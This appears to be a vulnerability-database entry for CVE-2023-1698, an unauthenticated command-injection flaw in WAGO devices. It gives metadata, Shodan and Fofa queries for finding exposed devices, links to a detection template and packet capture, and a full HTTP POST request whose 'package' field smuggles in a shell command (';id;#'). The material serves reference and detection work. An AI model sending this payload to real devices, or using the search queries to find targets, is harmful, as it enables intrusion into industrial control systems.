🔙 목록으로 돌아가기

CVE-2023-1698: WAGO - Remote Command Execution

TitleWAGO - Remote Command Execution
Authorxianke
SeverityCritical
ImpactSuccessful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the target system.
RemediationApply the latest security patches and updates provided by the vendor to mitigate this vulnerability.
CVSS Score9.8
EPSS Score0.93841
CVE IDCVE-2023-1698
CWE IDCWE-78
Shodan Queryhtml:"/wbm/" html:"wago"http.html:"/wbm/" html:"wago"
Fofa Querybody="/wbm/" html:"wago"
Tags cve2023 cve wago rce vkev vuln

🔍 Vulnerability Description

In multiple products of WAGO, a vulnerability allows an unauthenticated, remote attacker to create new users and change the device configuration which can result in unintended behavior, Denial of Service, and full system compromise.

🌐 HTTP Request

POST /wbm/plugins/wbm-legal-information/platform/pfcXXX/licenses.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:1.9.6.20) Gecko/ Firefox/3.6.6
Connection: close
Content-Length: 19
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

{"package":";id;#"}

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2023/CVE-2023-1698.yaml

🦈 Packet Capture: ⬇️ Download cve-2023-1698.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A